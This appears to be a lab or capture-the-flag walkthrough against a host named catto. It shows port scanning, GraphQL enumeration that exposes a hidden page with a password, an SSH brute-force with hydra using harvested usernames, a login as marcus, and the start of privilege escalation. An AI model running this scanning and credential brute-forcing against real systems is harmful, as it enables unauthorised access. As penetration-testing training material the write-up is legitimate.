$ nmap -p- --min-rate 3000 192.168.183.139
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 15:03 +08
Nmap scan report for 192.168.183.139
Host is up (0.17s latency).
Not shown: 65524 closed tcp ports (conn-refused)
PORT STATE SERVICE
2500/tcp filtered rtsserv
4907/tcp filtered unknown
8080/tcp open http-proxy
18080/tcp open unknown
30330/tcp open unknown
36123/tcp open unknown
38439/tcp open unknown
42022/tcp open unknown
42086/tcp filtered unknown
50400/tcp open unknown
56339/tcp filtered unknown
Lots of ports open. Did a detailed scan as well:
Web Enum -> GraphQL
Port 8080 shows a portfolio page:
It was rather static, so I moved to port 30330. This page had some book reviews:
This page looked more dynamic, so I ran a directory scan with feroxbuster, which found nothing of interest. Since we couldn't find anything with wordlists, I took a look through the local files:
There were a few interesting folders:
There wasn't much within the folders. On the 'Using Typescript' page, there was a link to documentation:
On the documentation page, there was mention of GraphQL being used, and sure enough /__graphql was a valid directory on the website as per the documentation:
The left had some queries already valid, so I checked those out. Using the allSitePage reveals all directories, including a hidden one:
Visiting it reveals a password:
This was a password to a Minecraft server. We didn't have a user, but the Minecraft page had some that we could try:
We can gather all the usernames into one wordlist:
I used hydra to brute force the creds:
We can then ssh in as marcus:
Privilege Escalation
.bash -> Base64key Root Creds
There was a weird folder .bash within the user's home directory:
This string looked like base64 but it wasn't. I looked at other binaries with base as part of their name:
base64key required a private key to decrypt, so I just tried the user's password and it worked:
$ sudo nmap -p 8080,18080,30330,36123,38439,42022,50400 -sC -sV --min-rate 3000 192.168.183.139
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 15:05 +08
Nmap scan report for 192.168.183.139
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
8080/tcp open http nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Identity by HTML5 UP
|_http-open-proxy: Proxy might be redirecting requests
18080/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
30330/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
36123/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
38439/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns:
| HTTP/1.1 400 Bad Request
|_ Connection: close
42022/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 cc2151f2c62aadd6ca0704de705ffa13 (RSA)
| 256 05e490d2002b9d14e39f4468d28ebcdc (ECDSA)
|_ 256 ca804973f0c805aebd2b42371d13e071 (ED25519)
50400/tcp open http Node.js Express framework
|_http-title: Error
|_http-cors: HEAD GET POST PUT DELETE PATCH
Minecraft: The Island by Max Brooks, #1 New York Times bestselling author of World War Z, is the first official Minecraft novel. In the tradition of iconic stories like Robinson Crusoe and Treasure Island, Minecraft: The Island will tell the story of a new hero stranded in the world of Minecraft, who must survive the harsh, unfamiliar environment and unravel the secrets of the island.
We loved this book so much that created a server. Already invited and added keralis, xisuma, zombiecleo, mumbojumbo, and waiting for a reply on the entire hermicraft clan. There is a limit on the server, but at least sabel, yvette, zahara, sybilla, marcus, tabbatha and tabby are already online and building.
Good luck everybody!
$ hydra -L users -p WallAskCharacter305 192.168.183.139 ssh -s 42022
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-07-12 15:20:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 11 tasks per 1 server, overall 11 tasks, 11 login tries (l:11/p:1), ~1 try per task
[DATA] attacking ssh://192.168.183.139:42022/
[42022][ssh] host: 192.168.183.139 login: marcus password: WallAskCharacter305
[marcus@catto ~]$ ls -la
total 20
drwx------ 5 marcus marcus 167 Nov 25 2020 .
drwxr-xr-x. 3 root root 20 Nov 25 2020 ..
-rw-r--r-- 1 root root 29 Nov 25 2020 .bash
-rw------- 1 marcus marcus 0 Apr 14 2021 .bash_history
-rw-r--r-- 1 marcus marcus 18 Nov 8 2019 .bash_logout
-rw-r--r-- 1 marcus marcus 141 Nov 8 2019 .bash_profile
-rw-r--r-- 1 marcus marcus 312 Nov 8 2019 .bashrc
drwx------ 4 marcus marcus 39 Nov 25 2020 .config
drwxr-xr-x 6 marcus marcus 328 Nov 25 2020 gatsby-blog-starter
-rw------- 1 marcus marcus 33 Jul 12 06:59 local.txt
drwxrwxr-x 4 marcus marcus 69 Nov 25 2020 .npm
[marcus@catto ~]$ cat .bash
F2jJDWaNin8pdk93RLzkdOTr60==
[marcus@catto ~]$ base
base32 base64 base64key basename
